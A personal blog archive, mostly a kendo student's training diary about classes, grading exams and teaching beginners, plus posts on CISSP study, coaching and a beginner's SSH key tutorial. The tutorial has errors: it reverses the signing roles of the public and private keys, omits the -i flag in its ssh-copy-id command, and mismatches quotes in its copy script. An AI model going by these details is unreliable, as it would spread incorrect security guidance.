One thing that I am conflicted about is the following: both Marli and myself think that I would make faster progress if I trained at Amstelveen twice a week, instead of once and once in Almere. However, to me this would feel like "abandoning" and disrespecting Almere after all their hospitality and because I truly feel that I can help them grow through the years. So it's a moral dilemma for me: do I choose harder training and faster progress, or do I choose loyality to the group that first took me in?

EDIT 17/02/2013:

Yesterday we did not end up talking to Ton-sensei, because I was occupied before class. While the group practiced kata, I took aside three beginners and Ramon to teach them the basics of shinai maintenance. The night before I had put together a cheapass kit of tools needed for the job: sandpaper, nails (to use as makeshift awl), an exacto knife and a few waxine lights. I taught them how to tighten the tsuru and the nakayui and how to look for splinters. I'm proud of Peter for spotting a bad take in his shinai, correctly noticing that it was splitting across the breadth. 

After warming up and legwork practice I was asked by Ton-sensei to teach the beginners group, while the guys in bogu did kihon practice with those whom already have had a few months' practice. But before we got to that, I taught Felix how to put on a tenugui and his men. The beginners, I took through oki-men and oki-kote by simply doing the suburi strikes back and forth across the training hall. The biggest problem I noticed was that all three of them end up with their arms far too low when striking men: the angles are all wrong. Just like they were with me ;)

My part of their training was ended with me introducing the mechanics of seme-to-tame-to-butsu to them. I didn't tell all of it to them, just to kakegoe, hold their breath, focus and then strike.  This showed good results with the two older beginners who were indeed more focused. But the youngster (I think he's 11) was afraid to kakegoe, he felt weird yelling at me, very embarassed.


kilala.nl tags: , , , ,

View or add comments (curr. 1)

Structures: solidifying goals and intentions

2013-02-10 11:54:00

My dou, with motto

One of the recuring themes in my coaching sessions with Rockover are "structures": things you put in place to act as reminders of something that you need to (or want to) change. I've talked about one of'm before. In order to solidify my new motto, I've given it the same treatment as the previous one that I took in: both adorn the inside of my dou, the torso armor worn in kendo.

Sure, my kanji look crappy, but it will serve its purpose: to remind me of what I want to achieve at the beginning of every training session, class and seminar. 

EDIT:

That photograph reminds me: the Agyo omamori in my dou is officially way overdue on being returned to the shrine it came from. We bought it in Nara in october of 2011 (photo of the temple), meaning that we were supposed to return in three months ago. Since I'm not religious I don't believe I'm calling down any bad luck upon myself, but then again I do value tradition :) Maybe I should drop another email to the dutch shinto shrine


kilala.nl tags: , , ,

View or add comments (curr. 0)

Whittling down the mistakes

2013-02-06 11:10:00

Last night's training was very nice: no lessons or class, just simply training, training and more training. Kihon, waza and jigeiko. Along the way I received pointers from our higher-ranked kendoka Kiwa, Machi, Makoto and Ran. Many of the pointers come down to improving techniques that are basic and important for my ikkyu ranking.

Funny detail: we relied heavily upon our prior seme-to-tame-to-butsu training last night. During our practice of hiki-men I faced against Makoto and against Loek and both gentlemen really succeeded in making me feel the seme building! Because a second or two after their kakegoe, I instinctively felt chills down my neck and found myself thinking "ohcrapohcrap, here it comes!" ( ^_^)

Also, it's interesting how I tense up in jigeiko. During most of practice my breathing was fine, but in jigeiko I got tired really fast, because my arms and shoulders lock up and my breathing goes to heck.


kilala.nl tags: , ,

View or add comments (curr. 0)

New kendo goodies! Thanks honey

2013-01-30 21:53:00

kendo uniforms and spare parts

In light of my planned ikkyu exam later this year, we'd been talking about buying me a new uniform set: one to keep neat and tidy, only to be used at tournaments and gradings. I'd been putting that off for months, until Marli last week decided to surprise me ( ^_^)

Originally she'd wanted to place the order by herself, but she had no idea what to order. So instead, one evening she grabbed and said "Let's shop!" :D Because I've been very satisfied with the service and products provided by Kendo24, we returned to them. And again they came through! My darling wife ordered me:

As I've grown accustomed from them, Bernd and Katrin provided excelent service. They provided quick and clear email feedback on my questions and shipping was very fast. They even threw in a free pair of chichikawa to attach the men himo, because I couldn't find those on their webshop. 

So, now I have two gi and a hakama for practice and a separate gi and hakama for special occasions. And I finally have a bit bucket of my own, for shinai maintenance.

A few interesting things about the clothes:

 

In closing: Thanks honey! I really appreciate the cool gift and your continued support in my training!


kilala.nl tags: , ,

View or add comments (curr. 0)

A new motto for this year: katsubou

2013-01-29 21:20:00

katsubou

Well! It's not every day that I get a mention on a 7th dan sensei's blog :D

My motto for 2012 was enryo (遠慮): "restraint". 

The motto has served me well and I will continue to be inspired by it. It still adorns my desk and it is on the inside of my dou. At the office I have become better at communicating and at sticking to boundaries and in kendo I have become less apt to rush in foolishly. 

For 2013 I will be adding a new motto, katsubou (渇望): "hunger, craving".

This motto comes through inspiration by four people whom I've come to respect very much. Donatella-sensei and Vitalis-sensei, after their instructions at the last Centrale Training. And Kris and Hillen-fukushou, based on their feedback to our recent kyu exams. Summarizing it: without stupidly rushing in (see above), I need to crave achieving yuko datotsu on my opponent. I need to hunger for "kills" and to show eagerness in all my undertakings. Only then will I be properly training and will I be able to show my current skill level in a shinsa.

Interestingly, this motto is also applicable professionaly insofar that I'm working to retain my CISSP certification. I'd slacked off over the past two years, but now I'm working hard to make up for that. In order to achieve this plan fully, I need to be "hungry". I need to keep at it, working on each successive goal in order to reach the final destination. 

It'll be an interesting year :)


kilala.nl tags: , , , ,

View or add comments (curr. 0)

Kendo kyu exams in Almere

2013-01-26 16:51:00

Photo gallery of the morning.

This morning were the (semi-)annual kyu grade exams at Renshinjuku kendo dojo. I'm told that we're the only dojo in the Netherlands that actually do intermediate kyu exams, but personally I think they're a good thing. These exams help prepare our students for the actual exam, making the real thing a lot less scary.

Today, thirteen students were testing: five for 5th, one for 4h, two for 3rd and five for 2nd. The way we test 2nd kyu is actually identical to the official 1st kyu exam, meaning that we're getting a full prep for ikkyu

The good news is that everyone testing up to 3rd kyu passed their grade. So congratulations to Ainar, Lukas, Dennis, vincenzo, Herman, Ramon, Aaron and Hugo! Good work eveyrone!

The group testing for 2nd kyu wasn't as successful. Only Jeroen was deemed to be ready to take and pass the ikkyu exam, so many congrulations to him: you've worked hard for this Jeroen!

Bobby, Martijn, Tiamat and myself were all given valuable pointers on what we need to improve to be ready for the 1st kyu exam. Two pieces of advice were applicable to all of us:

  1. In jitsugi, you need to be hungry! You need to really want to make those ippon! Don't be passive and don't do shiai kendo. Instead, have at it!
  2. Stick to kihon. There's no need for über-special techniques, because if you -do- try those they'd better be done right!

At this level you're trying to prove that you fully understand and control the basics.

I had already set a number of goals for myself to work on, in order to attain ikkyu rank: get a decent hayai-men, control my breathing, and less cueing before a strike. Also: make for a neat and tidy kirikaeshi, because a few weeks ago I was still all over the place. Added to this comes the feedback from Kris and Hillen:

After the exams, Aaron said his farewells to me. I'm sad to see him go because he shows a lot of promise. Maybe he'll be back in a few years. 

All in all it was a very educational morning! I am confident that I showed my best kendo:

While my kendo was not up to par to pass our 2nd kyu exam, I am confident that I gave it my best. I simply need to keep on getting better! :)

EDIT: Woohoo! I've spoken to Ton-sensei and he indicates that I defaulted to 3rd kyu, meaning that I have at least improved my kendo since last year. So when it comes to the line-up in class, the only thing that changes is that I have now hopped at least six spots to the right :)


kilala.nl tags: , ,

View or add comments (curr. 3)

Learning a new skill: seme to tame to butsu

2013-01-22 20:09:00

Tonight’s class was guided by Fukuyama-sensei, in the absence of Heeren-sensei, with Kiwa-sempai providing translations for those not familiar with the Japanese language. After the usual warming-up routine (no kata practice tonight), we moved on to two separate but entwined subjects:

  1. Seme to tame to butsu
  2. Hiki waza

In kendo we are often taught to “build pressure”, to “feel tension” before launching an attack. This pressure is described with the word seme (攻め) and it is something that is learned through long practice. The Glossary related to budo and kobudo by Guy Buyens offers the following:

SEME (攻め) in BUDO (武道) is usually used to indicate the initiative to close the distance and maintain the pressure when launching an attack. This can be part of a very decisive and even explosive technique or in combination with TAME (溜め), where pressure is build in a more gradual way and where the final target depends on the reaction of that opponent.

Tame, from the verb tameru, meaning “to ammass” or “to accumulate”. In this case we are creating seme and then gathering more and more tension. For this particular session, Fukuyama-sensei described our exercise as follows:

  1. Assume issoku itto kamae.
  2. Generate seme.
  3. Inhale deeply and kakegoe (*) strongly.
  4. Do NOT inhale, do NOT exhale further.
  5. Hold your breath for five seconds.
  6. Attack at your fiercest, with a very strong kiai.

Fukuyama-sensei explained that, in this exercise, holding your breath will help you retain focus on your opponent and on seme. This way you are deeply invested in your attack, almost guaranteeing a beautiful strike. He compared it to a story he once heard about olympic sprinters, who would finish their 100m dash without breathing to retain 100% focus.

We practice seme to tame to butsu with different kihon and waza: first with chisai men, kote and dou, then in oji waza where motodachi would attack with chisai men. As usual we were told to do our very best attack, because otherwise the exercise would be useless.

Before moving on to jigeiko, we practiced the various hiki waza: men, kote and dou. These exercises were combined with the previous tame exercises. When it came to hiki dou, Fukuyama-sensei explained that moving backwards can be done in three backwards directions.

  1. To the left is sub-optimal, as it makes it hard to properly strike and follow through.
  2. Straight, where you remain on the center line of your opponent.
  3. To the right, making for an easier strike while also putting you off the opponent’s center.

For showing zanshin after hiki dou, Fukuyama-sensei said that you should relax after striking. Your arms should not be tense and your shinai should not be immovable. Instead, follow through downwards in the natural arc of your strike and relax your arms (so you are also ready for a counter attack).

*: For extensive information on kakegoe, what you could call the “kiai in kamae”, please refer to chapter 13 of Noma Hisashi-sensei’s ‘Kendo Reader.


kilala.nl tags: , ,

View or add comments (curr. 0)

Preparing for my exams

2013-01-20 09:37:00

2013 will be a year of exam preparation for me. Not only at work (ITILv3, RHCSA, maintaining my CISSP), but also in kendo. 

Last year I decided that I want to take my ikkyu exam this summer, ikkyu being the first grade that is tested on a national level. I wrote the shinsa prep guide for the RSJ website and based on my research, I will need to do the following for my ikkyu exam:

In the first three tests, kiai is highly important at the ikkyu level, so I'll definitely give that my best!

The NKR exam is still a few months away, so I'm very happy that I'll be getting an extra exam in between. A month ago Ton-sensei announced that Renshinjuku Almere would be holding their local kyu-grade shinsa on 25/01, which is next week. I've asked Ton-sensei and Hillen- and Kris-fukushou to keep in mind my aspiration of testing for ikkyu. For our own exams this means that I'm asking them to allow me to skip a grade and to test for nikyu instead of sankyu, while at the same time asking them to judge me at ikkyu level. That's a bit of a leap (I last tested for yonkyu a year ago), but they appear very willing to help me out for which I am very grateful. 

To do list before next week:


kilala.nl tags: , ,

View or add comments (curr. 2)

Taught kendo for the first time

2013-01-20 08:43:00

Ahhh, life :) I've just gone over the last weeks worth of blogposts from when I was still in college, working on getting my teaching degree. On the one hand I love reading about that time, on the other it makes me a bit sad because it's all done and gone. There's that 'mono no aware' again: the beauty of passing/fading. One thing that has never left me though, is the fact that I love to teach. 

That's why I was thrilled when Ton-sensei asked me to teach the beginners group for a part of class. :)

After warming up and doing footwork practice (laps of okuri ashi, lunges and fumikomi), my sempai suited up for kihon and waza practice (suriage-men, ai-men etc) and I took the group of a dozen newbies. Because I hadn't prepared anything beforehand and because Ton-sensei didn't have any specifics he wanted me to teach, I went through the following thought process.

Putting all of that together, I decided to work on ki-ken-tai-ichi: the unity of mind, sword and body during a strike. This builds upon what we've done so far and is something that the group could use in kihon practice with Jeroen. These are the drills I went through with them:

In each of these practices, I first let the group do them a number of times without me saying anything. Five men strikes, twenty haya-suburi, two laps of okuri-ashi, etc. I only observed them, trying to see what everyone is doing. After the initial round, I would provide general feedback without singling anyone out. Then I'd let them repeat the exercise again, doubling the amount of strikes/laps. During this second round I would provide the students with personal feedback.

I'm very glad that the group paid full attention! At no point in time did they start drifting away or were they slacking off which, I hope, was caused by my demeanor and posture: stern and polite, speaking clearly and loudly and giving precise instructions. Once again my strong lungs came in handy, as I was able to address the group as they lined up (no huddle needed) and still being heard over the loud group in bogu

I certainly hope to teach again sometime soon :)


kilala.nl tags: , , ,

View or add comments (curr. 2)

ITILv3: bone dry material

2013-01-13 20:31:00

Dry dry dry

*cough**hack* Someone get me a glass of water! 

After getting some quick credits out of the way for my CISSP certification, I'm now moving on to ITILv3 Foundations, all according to plan. But boy, oh boy, is that some dry reading material! When I first took my ITILv2 exam in 2001, it took some slugging and then I made the certification in one go. So technically you would expect me to get through this renewal easily. Well, I'm working through this particular book and it's drrryyyyyyyyaaaaihhh. A veritable deluge... no, that implies "wet"... A veritable landslide of management terms and words, rammed into short definitions, makes for something I have trouble getting through. 

Maybe I'd better get another book :)

Pictures not mine, sources A and B.


kilala.nl tags: , , ,

View or add comments (curr. 0)

Coaching: better than I expected

2013-01-12 13:45:00

Quite a while ago my dear friend Menno started a career in personal coaching. He's still a civil engineer, but as a side business he runs Rockover Coaching which is based on the co-active coaching formula. It took a lot of hard work, but he's now ready to start working with clients. As part of his startup year, he asked me whether I'd like to be a 'victim' and I gladly accepted. I may have an ingrained mistrust of coaches, but I know I can trust the guy who's been my best friend for 27 years ;)

Over the past few weeks we've used a lot of different techniques to explore various topics, such as:

So... After almost three months of weekly coaching I have to say it's a lot more fun and interesting than I thought before starting with Menno. I had a few other touch-feely courses (through work) before this, but none of those were as comfortable as this.


kilala.nl tags: , , ,

View or add comments (curr. 1)

Not much to say: it was good

2013-01-12 13:33:00

There's not much to say about today's training as it simply was a good, solid training. 

1.5 years ago I wrote about a kendo dummy that I would love to build. Lo and behold! Ton-sensei has built two for the dojo: one child-sized and one adult-sized. They look cool and after tweaking them a bit, many of our beginners were very happy to use them in training. 

After inspecting the dojo shinai I proceeded to go through kata #1-#4 with Hugo. Since he told me he was pretty rusty (he's often absent because of school) I took a firm lead and escorted him through the first three, correcting where needed. When we got to #4 I'm glad that Ton-sensei corrected a number of things I was doing wrong (most importantly, stab too high and at a wrong angle).

During footwork practice I was reminded yet again that I have trouble combinining okuri ashi with fumikomi: whenever I need to jump while going forward, I always overstep with the left foot before the jump. The timing is completely off: instead of jumping right after pulling the left leg in, my body tries to jump after the right foot has gone forward again. It's crappy.

Kihon and waza practice went pretty well, but it was jigeiko that stood out for me today :)


kilala.nl tags: , ,

View or add comments (curr. 0)

A great session in Amstelveen

2013-01-09 08:50:00

I'm not entirely sure what happened, but last sunday's Central Training did wonders for my confidence. Last night was the first time I can recall that I went to Amstelveen without feeling nervous. I was aching to practice with my sempai and I'd prepared to answer any questions I might get about what we learned during the CT.

I reckon that attending the CT was a good step in my continued 'exposure', trying to alleviate my anxiety issues. The CT was outside my comfort zone and because it went so well, it seems my boundaries have shifted a bit. Nice!

Class was started, as has become custom, with half an hour of kata training. I again partnered with Nienke and we did many repeats of kata #1 (and a bit of #2 and #3). Why focus so much on kata #1? Because of some contention we ran into! I'd been taught by Ton-sensei and Kris-fukushou that after being struck by shidachi (and after letting the bokken sink to eye level), uchidachi would be "pushed back" by shidachi. Shidachi would "threaten you away". Instead, Kiwa-sempai and Ran-sempai informed us that "uchidachi always moves first", so the new analogy would be that uchidachi attempts to flee, with shidachi preventing this by assuming a threatening pose. Interesting!

After kata a shinai check was performed, which has also become customary. I heard that last Saturday ~70% of the students' shinai were rejected during the check, leading to an impromptu lesson in maintenance. Hence Renshinjuku kendo dojo have instated the rule that, if your shinai is rejected, you will now spend the training repairing the big collection of dojo-shinai. Both of my shinai were in an "okay" state, though not very good. After tightening the tsuru of my second one, I was allowed to join class. So, time for another evening filled with maintenance!

After warming up, we moved to waza practice. A few rounds of kirikaeshi variations, followed by oki-men, oki-kote, hiki-waza from tsubazeriai and men-oji-waza. There wasn't any explanation of techniques, just the chance to practice a lot.

I had jigeiko with Onno-sempai, (I think) Tsuyuguchi-sensei and with Raoul-sempai.


kilala.nl tags: , ,

View or add comments (curr. 0)

Intensive kendo training: "central training"

2013-01-06 19:08:00

Almost a year ago I visited the Landstede sport center in Zwolle, to participate in the NK kyu-graded kendo. Today, we made the trek to attend the first 'central training' of the year. It's "central" insofar that it's a large kendo training, for all dojo in the Netherlands. Marli took my daughter for a fun-filled morning at Ballorig in Hattem, while Jeroen-sempai, Nienke and myself went to the training. Marli 'sacrificed' her usual day off, so I could have a great training day.

And great it was! Today's practice pulled in about 50 people (est. 15 beginners, 15 kyu-graded and 20 dan-graded), with four high-placed sensei and our honored chairman Odinot taking the lead. Today's agenda was as follows:

  1. 25 minutes of joint kihon practice of hayai-techniques. Also, ki-ken-tai-ichi exercises.
  2. 80 minutes of waza practice under Vitalis-sensei, while Wouters-sempai instructed the beginners.
  3. 20 minutes break/lunch.
  4. 60 minutes of jigeiko.

Under Vitalis-sensei, the group was split into mudansha and kodansha so everyone got from practice what they needed. We practiced the following techniques, some of which were new for many of us. Each technique was practiced 2x2 times, after which shugou was called in order to learn the next one. 

 

I got a chance to have jigeiko with three of the leading sensei

  1. I didn't receive any specific feedback from Barbier-sensei. I tried to use a few of the techniques we learned, combined with some of the stuff Heeren-sensei taught us. After a few minutes, Barbier-sensei asked me to do a round of kirikaeshi.
  2. I very much enjoyed my round with Castelli-sensei, who has a very enthousiastic and energizing personality. She let me try a few techniques, then took me aside to tell me (paraphrased): "You need to want your target. I see you hitting air, making a lot of movement, but never getting to where you want to go. I see you go for men, but you don't get to my men. I see you go for kote, then don't hit kote. You need to WANT to hit. You need to WANT to put your shinai on my head! Be hungry! You need to be like an animal of prey". And yeah, that was a very interesting realization for me! I hadn't thought of it like that, but she's right! The next few attacks I was a lot more focused, after which she took me aside again. "The Japanese say: ichi gan, the eyes are first. I see you very often not looking at your target. You strike my kote, but look somewhere completely else! Don't! Eyes on the target!".
  3. Right before the closing kirikaeshi, I had a very short round with Vitalis-sensei. At first I had offered to cede my position to mrs De Jong who outranks me, but Vitalis-sensei said I shouldn't do that. "I don't care if they're 10th dan! In kendo you need to be hungry and egotistical to get the training you want. You need to be fast in dressing, first in line and scramble for practice with the teachers you want!" Based on the few strikes I made for him, he also warned me that right now I shouldn't yet be trying "patient"/"waiting" kendo. "Make attacks! Make plenty of attacks! Right now you still have plenty of time to make plenty of mistakes. If two out of ten strikes land relatively close, that's great!" Which certainly sounds a lot like what Kris-fukushou keeps telling me: I wait too much.

During closing, Vitalis-sensei shared the following remarks.

After the training we quickly visited Kaijuu and Natalie and then headed home. Nienke and Jeroen were dropped off at the station again, after which the three of us went for dinner at Tang Dynastie. Great food, as always. All of us exhausted, our kid quickly fell asleep at 1900 and now it's off to bed for us as well :)


kilala.nl tags: , ,

View or add comments (curr. 0)

Well, that wasn't good

2013-01-05 15:02:00

Wow, I can tell that I haven't done any kendo the past three weeks :(

Today's practice went pretty badly for me, because I'm -already- out of shape! Three weeks of no sports is killer, after a few months of only two kendo practices each week. I really need that third session at home to keep up. I'm sad to say I had to bow out from the bogu-group twenty minutes before the end of class.

I got some very important feedback from Ton-sensei: my hayai-men is still almost as bad as a year ago. I still make the same damn mistakes as before, where I pull back large and only stretch forward when striking instead of stretching forward and then striking with a tiny movement. 1.5 years later I am still making the wrong movements. 

Also, whatever progress I had made with my breathing is now gone again. It was crap today and was the biggest cause of my early drop-out.

The second pointer I got from Ton-sensei is that I'm cueing my attacks. We already knew that, but I didn't know -this- particular cue! The Miyaharas and Zicarlo-sempai all told me about my footwork issues, right before launching an attack. But Ton-sensei also pointed out that I dip my shinai before swinging upwards. 

So, my training goals for this year: get a decent hayai-men, control my breathing, and less cueing before a strike.


kilala.nl tags: , ,

View or add comments (curr. 1)

Study plan for 2013: continued education

2012-12-21 06:03:00

Because I like to keep work and my private life very much separated, I usually try to do as little IT stuff at home as possible. "Work is work, home is home", I often say and so far it's made for a pleasant balance between the two where I don't take home too much stress. But, as much as I dislike it, being in the IT workforce means there is a very real need for continued education. So every once in a while I will do a huge burst of studying in one go, to achieve a specific goal or two. Case in point: 2010's CISSP certification.

However, said CISSP certification means that I will now need to start using a different approach in my continued education. I can no longer work with infrequent bursts, as I need to obtain a certain amount of CPE credits every year. Which is why I broke out the proverbial calculator and did some math to determine what I should do on an annual basis to retain my CISSP. Instead of huge bursts of work, I will now be spreading out my studies.

Which is why I made the following planning, for my 2012/2013 studies.

 

Again, with many thanks to my colleague Rob for making the final needed suggestion to get me to sort out the CPE calculation. And to my coach in being my sparring partner in all of this.

 


kilala.nl tags: , ,

View or add comments (curr. 0)

SSH keys for dummies: how to set up ssh_pk authentication

2012-12-20 21:18:00

How to set up SSH keys in three easy steps

Creating and configuring SSH key authentication can be a complicated matter. Ask any techie, including myself, about the process and you are likely to get a very longwinded and technical explanation. I will in fact provide that exhaustive story below, but here's the short version, where you set up SSH key authentication in three easy steps.

 

Quickly setting up SSH key authentication

Generate a new key pair using...

ssh-keygen -t rsa

...and just press Return on all questions.
Install the "lock" on your door using...

ssh-copy-id ~/.ssh/id_rsa.pub $host

...where $host is your target system. Or, if ssh-copy-id is not available, copy these instructions.
You're done! Start enjoying your SSH connection!

ssh $host

 

Please feel free to print the poster of this three-step approach, just to make sure you don't forget them.


 

What is SSH anyway?

SSH, short for Secure SHell, is an encrypted communications protocol used between two computers. Both the login process as well as the actual data interchange are fully encrypted, ensuring that prying eyes don't get to see anything you are working on. It also becomes a lot harder to steal a user account, because simply grabbing the password as it passes over the network becomes nigh impossible.

The name, secure shell, hides the true potential of the SSH protocol as it allows for many more functions. Among others, SSH offers a secure alternative to old-fashioned (and unencrypted) protocols such as Telnet and FTP. It offers:

SSH is cross-platform, insofar that both server and client software is available for many different operating systems. Traditionally it is used to connect from any OS to a Unix/Linux server, but SSH servers now also exist for Microsoft Windows and other platforms.

SSH is capable of using many different authentication and authorization methods, depending on both the version of SSH that is being used and on the various provisions made by the host OS (such as PAM on a Unix system). One is not tied to using usernames and passwords, with certificates, smartcards, "SSH keys" (what this whole page is about) and other options also being available.

Unfortunately, its flexibility and its many (configuration) options can make using SSH seem like a very daunting task.

 

What are SSH keys?

The default authentication method for SSH is the familiar pair of username and password. Upon initiating an SSH session you are asked to provide your username first, then your password, after which SSH will verify the combination against what the operating systems knows. If it's a match, you're allowed to login. If not, you're given another chance or so and ultimately disconnected from the system. However, the need to enter two values manually is a burden when trying to automate various processes. It often leads to hackneyed solutions where usernames and passwords are stored in plaintext configuration files, which really defeats the purpose of using such a secure protocol.

SSH keys provide an alternative method of authenticating yourself upon login. Taken literally, an SSH keypair are two ASCII files containing a long string of seemingly random characters and numbers. These keys are nearly impossible to fake and they only work in pairs; one does not work without the other. The reason why SSH key authentication works, is because what is encrypted using one key can only be decrypted using the other key. And vice versa. This is the principle behind what is known as public key cryptography.

Public key encryption, and thus SSH key authentication, is a horribly complex technical matter. I find that for most beginners it's best to use an analogy.

A keypair consists of two keys: the public and the private key. The public key could be said to be a lock that you install on an account/server, while the private key is the key to fit that lock. The key will fit no other lock in the world, and no other key will fit this particular lock.

Because of this, the private key must be closely guarded, protected at all cost. Only the true owner of the private key should have access to it. This private key file can be protected using a password of its own (to be entered whenever someone would like to use the key file), but it is often not. Unfortunately this means that, should someone get their hands on the private key file, the target account/host becomes forfeit. Thus it's better to use a password protected keyfile in combination with SSH-agent. But that's maybe a bit too advanced for now :)

The public key on the other hand can be freely copied and strewn about. It is only used to set up your access to an account/server, but not to actually provide it. The public key is used to authenticate your private key upon login: if the key fits the lock, you're in. "Losing" a public SSH key poses no security risk at all.

Of course there's one caveat: while losing a public key is not a problem, one should not simply add public keys onto any account! Doing so would enable access to this account/server for the accompanying private key. So you should only install public keys that have good reason for accessing a specific account.

 

How does SSH key authentication work?

So how does SSH key authentication work? It all relies on a public key infrastructure feature called "signing". The exact process of SSH key authentication is described in IETF RFC 4252, but the gist of it is as follows. 

  1. The destination system "signs" a test message with your public key
  2. The source system verifies that signature using your private key
  3. If the signature checks out, then we know that the pair of keys match. You're allowed to login.

As I said, this only works because the public and private key have an unbreakable and inimmitable bond.

All of the following text assumes that you already HAVE a ready-to-use SSH keypair. That's the first step in the three-step poster shown at the top of this page. Generating a keypair is done using the ssh-keygen command, which needs to be run as the account that will be using the keys. Basically: ssh-keygen -t dsa is all you need to run to generate the keypair. It will ask you for a passphrase (which can be left empty). 

 

What if you don't have ssh-copy-id?

Unfortunately ssh-copy-id is not included with every SSH client, especially not if you're coming from Window. Unfortunately, the instructions below will only work when your source host is a Unix/Linux system, so if you're using Windows as a source you will definitely need to use the manual process. The script below also assumes that the remote host is running OpenSSH.

Copy and paste the script below into a terminal window on your source host. It will ask you to enter your password on the remote host once.

==============================================================

echo "Which host do we need to install the public key on?"
read HOST
ssh -q $HOST "umask 077; mkdir -p ~/.ssh; echo "$(cat ~/.ssh/id_rsa.pub)" >> ~/.ssh/authorized_keys"

==============================================================

This could fail if the public key file is named differently. It could be id_dsa.pub instead, or something completely different if you are running a non-vanilla setup. 


Setting up SSH keys the hard way

So, finally the hardest part of it all: getting SSH keys to work, without the use of ssh-copy-id or any other handy-dandy tooling. 

First up, there is the nasty fact that not all SSH clients and daemons were created equal. There are different standards that they can adhere to when it comes to key file types as well as the locations thereof. Because Linux and open source software have become so widespread, OpenSSH has become very popular as both client and server. But you'll also see F-Secure, Putty, Comforte, and a whole wad of others out there. 

To find out which Unix SSH client you're running, type: ssh -V

For example:

$ ssh -V
ssh: F-Secure SSH 5.0.3 on powerpc-ibm-aix5.3.0.0


$ ssh -V
OpenSSH_4.3p2, OpenSSL 0.9.8j 07 Jan 2009

OpenSSH

F-Secure

Putty and WinSCP

When you are going to be communicating from one type of host to another (SSH2 vs OpenSSH), then you will need to perform key file conversion using the ssh-keygen command. The following assumes that you are running the command on an OpenSSH host.

Key points to remember

Always make sure you are clear:

File permissions


kilala.nl tags: , ,

View or add comments (curr. 1)

A class out of the ordinary

2012-12-19 15:33:00

 

Pfff... You would think that after nearly a year of training with my sempai in Amstelveen, I wouldn't be anxious anymore. But I am. :)

They're great people, but I always dread acting like a complete newbie around them. That and I fear that I'm not pulling my weight. Well, nothing to do but push on! Maybe this will be a nice subject for my next coaching session

Last night was a training out of the ordinary. Seeing how it was the last tuesday-night session for 2012, the turnup was smaller with only one sensei appearing and the group totaling out at roughly fifteen people (nine in bogu). While Roelof-sensei kept an eye on everyone for details, Kiwa-sempai led the advanced group in what I found to be a tremendously educational class. 

The first half hour of class was spent on practicing kendo kata. I finally got a chance to practice with Nienke, a classmate whom I appreciate and with whom I'm on-par. We went through kata #1 through #3 and focused greatly on practicing #3. A lot of things that I thought I was doing right, I turned out to be doing slightly wrong or I just learned them a bit differently. Under the watchful eye of Onno-sempai, Roelof-sensei and Kiwa-sempai I got a lot of pointers.

The next half hour was spent on learning the bokuto ni yoru kendo kihon waza keikoho, also known as the kihon bokuto waza. This set of exercises is relatively new and targeted mostly at beginning students and lower-ranked kendo. Here, one practices the various techniques in kendo in a more realistic as well as entry-level setting: unarmoured and with a bokuto, which is shorter than a shinai. Much more information can be read in this excelent PDF. In class we practiced kata #1 through #3, which are:

  1. The four basic targets: men, kote, dou and tsuki.
  2. A successive kote-men.
  3. The harai-men technique.

Despite seemingly being a lot easier than normal kata, I had a surprising amount of trouble getting the motodachi role right. And, as I have with the normal kata, at first I held back when striking at Nienke for fear of actually hitting her. In this regard, I overheard a very important comment from Kiwa-sempai who said to strike without power, but in a relaxed fashion. 

The last half hour was dedicated to jigeiko. The beginners' group joined Roelof-sensei for kihon practice, while the advanced group went through their desired routines. While most duos did actual sparring, I was very grateful for Zicarlo-sempai's help in practicing kirikaeshi. As expected I soon got winded, because I'm still messing up my breathing :) It was great practice though and I need a lot more of it, if I want to test for ikkyu this summer. 

The biggest failings I showed today were my over-use of my right hand which thus lead to hitting way too hard. Also, I was cueing, as Zicarlo said, because I kept fiddling with my footing. Every single time, before pushing off on the left foot, I would re-set my left foot one last time. This is in part due to my under-estimating the reach of my shinai: I keep fearing that I cannot reach my target.


kilala.nl tags: , ,

View or add comments (curr. 0)

Muscle ache? Check!

2012-12-16 08:57:00

kendo notes

Between my sterilization, the Dinosaurs show, standby duties and Alegria I've been absent from kendo class for two full weeks. And because I've been so busy with work I haven't practiced at home either. I feel guilty about it, but as they say: "god's punishment is swift" because boy do my muscles hurt! (;^_^)

It's great to see how our group keeps growing with newbies, who also show great attendance. Sadly, we don't seem to have much luck with the guys in bogu though. Sander is very busy with work, Hugo has a lot of schoolwork as do Jeroen, Martijn and Houdaifa and I myself have family and work stuff. So that's six guys who should be senior in the group, but who have problems making attendance. On the one hand it's beneficial to the friendly atmosphere in our dojo that Ton-sensei is so lenient about attendance, but on the other hand our attendance issues do keep both ourselves and our juniors from learning as quickly as we could. 

When it comes to our members, it's also interesting to see how many young kids we attract. We don't yet rival our mother-dojo in Amstelveen (who have flocks of Japanese children attending training on saturday), but I'm willing to bet that we're in the top four with the amount of kids. Bobby doesn't count anymore as she started high school this year, but between Aaron, Ainar, Nathan, Lukas and the Korean-boy-whose-name-I-havent-learned-yet we have five students of ten or younger.

Now, on to class. After warming-up we started with lunges in order to improve footwork and balance. I don't keel over anymore, but that's because I'm over-compensating. There are two commonly made mistakes: either you keep a too-narrow stance and can't keep your balance, or you over-compensate for that and take a too-wide stance (as per graphic A above). Kris-fukushou reminds us that we really should keep our feet at the proper width during the whole practice. 

We practiced kihon in the motodachi system, with the eight guys in bogu acting as partner for the dozen or so people without bogu. After that the group was split up as usual and my group moved on to waza practice. The two most important lessons for myself were about debana kote and suriage men

With debana kote I was always confused: do I need to move my shinai over or under my opponent's blade? Turns out that it's neither, because both are too slow :) As per graphic B, Kris explained that your shinai stays almost level, while the opponent moves in for a men-strike. That way you automatically duck under his shinai and you also stay close enough for a quick kote strike. 

Now, suriage men is apparently a very difficult technique for kyu-grade students, but it doesn't hurt to get introduced. Kris-fukushou suggested the D/C-shaped movement that is also mentioned by Salmon-sensei in the linked article. And as Salmon-sensei points out, most of us were having lots of issues with both the movements and the timing. In my case I feel way too slow and I have it in my mind suriage men is a two-stage movement, while it should be more of a single arc where you deflect and strike from the deflect position. 

Aside from these things, Kris-fukushou warned me about my kiai and kamae. I think it may tie in with a warning Onno-sempai gave me a few weeks ago. If I do my kiai incorrectly, I hunch and lock my arms. There's a big difference between a relexed posture and an "open" "YIAAAAAA!" yell and a tight/locked posture with a "closed" "RRUAAAGH!" yell. Once I'm locked up, I can't strike quickly nor properly. 

Class was closed with all student in bogu acting as motodachi in uchikomi geiko, which the other students had to run twice. That meant a total of fourteen rounds of five strikes for everyone. A great way to close this last class of the year!


kilala.nl tags: , ,

View or add comments (curr. 0)

Confessions of a CISSP slacker

2012-12-09 10:30:00

